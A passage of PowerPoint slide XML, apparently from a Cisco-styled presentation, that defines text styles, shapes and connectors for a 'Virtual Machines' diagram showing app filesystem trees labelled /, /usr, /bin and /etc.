                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Virtual Machines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC0FE47-7E58-CC42-A0B8-FE1C4F7FEE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2014156" y="1934077"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05A279D-311A-6741-B129-FDC0EEB1DCEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426809" y="2389585"/>
            <a:ext cx="682226"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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F143D4-DC54-6141-83AD-C25A426ACE65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2541475" y="1934077"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E56BA5E-AA30-814B-AF28-374DA76F382D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065884" y="1934077"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Elbow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CD5F76-29DA-5544-89C1-2BB878F6963D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487935" y="3908708"/>
            <a:ext cx="240012" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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28D76356-BB7F-3D4B-879D-53E622E471B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3524154" y="2396888"/>
            <a:ext cx="327557" cy="1840020"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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B40E38A7-C51E-664B-AA0C-E457DD87BD18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5365503" y="2385620"/>
            <a:ext cx="337494" cy="1852617"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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905DAFE8-BADD-0D48-B45F-8D23B34C2C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4438344" y="3308860"/>
            <a:ext cx="341416" cy="2216"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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48A8DE59-F5C9-5646-908E-245F7FDAC728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="0"/>
            <a:endCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2695598" y="2772771"/>
            <a:ext cx="144648" cy="1"/>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440BB330-C5D5-D848-BE10-E19C7C0FB869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="16" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2430633" y="2052296"/>
            <a:ext cx="144647" cy="529933"/>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69FF63E1-6101-E543-AA52-CBD61128AC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="18" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2694293" y="2315955"/>
            <a:ext cx="144647" cy="2614"/>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72FA12C1-A43B-BE4D-831A-19DC303E15EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2956497" y="2056364"/>
            <a:ext cx="144647" cy="521796"/>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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCC1A1AE-2644-684D-AA74-8EC865F49F61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855390" y="1917366"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7462F3FD-CFA1-9049-BC65-40A713F21FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4268043" y="2372875"/>
            <a:ext cx="682226"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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6189446-ADFB-5348-BF1C-EFD8CE5230CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4382709" y="1917366"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB3EC8F-C5C3-274C-AC29-0A15EF2D2FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907119" y="1917366"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Elbow Connector 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70ED04C2-3175-7242-8B91-B9297161E7D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="0"/>
            <a:endCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4535908" y="2756985"/>
            <a:ext cx="147500" cy="1003"/>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5CECD0FB-FCDD-7545-964D-4D568CFF6647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="50" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4271867" y="2035585"/>
            <a:ext cx="144647" cy="529933"/>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87D5447F-55B0-2545-B3A8-012703992FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="52" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4535527" y="2299245"/>
            <a:ext cx="144647" cy="2614"/>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DE92A96C-9419-504C-AAB4-A458C5F6EF6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="0"/>
            <a:endCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4797731" y="2039653"/>
            <a:ext cx="144647" cy="521796"/>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60" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE49E3F7-CA13-F343-A04E-42C068884583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706742" y="1913563"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A93DC7C0-7F94-F748-8FF3-E5836CA28863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119395" y="2369071"/>
            <a:ext cx="682226"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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9029D46-9813-1B49-B287-EE7BEFC16787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6234061" y="1913563"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DF1D2C-E4F2-BB41-AEEC-7B4872C2F808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758471" y="1913563"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Elbow Connector 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC46139B-2FAD-D545-B59C-C8F1B6FE0399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="0"/>
            <a:endCxn id="61" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6382923" y="2757521"/>
            <a:ext cx="155224" cy="51"/>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5" name="Elbow Connector 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0343C1C-B4D2-CF49-A320-E77EBC9CEBF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="0"/>
            <a:endCxn id="60" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6123220" y="2031783"/>
            <a:ext cx="144647" cy="529933"/>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F2A65AD1-A636-2848-8C50-3736FD9F97AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="0"/>
            <a:endCxn id="62" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6386879" y="2295441"/>
            <a:ext cx="144647" cy="2614"/>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7" name="Elbow Connector 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1158E4F0-305E-F143-B017-BB4B122783E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="61" idx="0"/>
            <a:endCxn id="63" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6649084" y="2035850"/>
            <a:ext cx="144647" cy="521796"/>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D22404E9-853A-C542-88DB-D69F236A6AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1977907" y="1639941"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="TextBox 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A1517A-FC70-6344-AE33-B54742C7490F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502955" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="TextBox 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA471BD-C117-DE49-8D00-A9C7C3A27539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028819" y="1646239"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="TextBox 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A97255F2-F29D-E245-9700-75139AB08563}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3812365" y="1639941"/>
            <a:ext cx="556364" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>APP 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="TextBox 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
